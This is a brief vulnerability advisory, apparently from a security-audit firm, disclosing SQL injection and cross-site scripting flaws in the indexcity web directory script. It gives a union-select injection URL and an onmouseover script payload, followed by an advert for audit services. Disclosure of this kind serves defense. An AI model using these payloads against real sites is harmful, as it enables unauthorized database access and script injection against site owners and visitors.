PoC/Exploit for SQL Injection and XSS Vulnerabilities in indexcity
Published Proof of Concept code - SQL Injection and XSS Vulnerabilities in indexcity.
- Description
- Available
- Solution
- Not available - check CityForFree website
1. SQL Injection Example.
URL: http://host/indexcity/list.php?cate_id=999'%20union%20select%201,2,3,4,5,6,7/*
2. Cross-Site Scripting Example.
URL: http://host/indexcity/add_url.php
Website: aaa.com' onmouseover='alert(123)'>
Order Source Code Audit made by eVuln
Prevent hacker attacks by source code audit of your site done by eVuln team.The task will be done by experts in website security.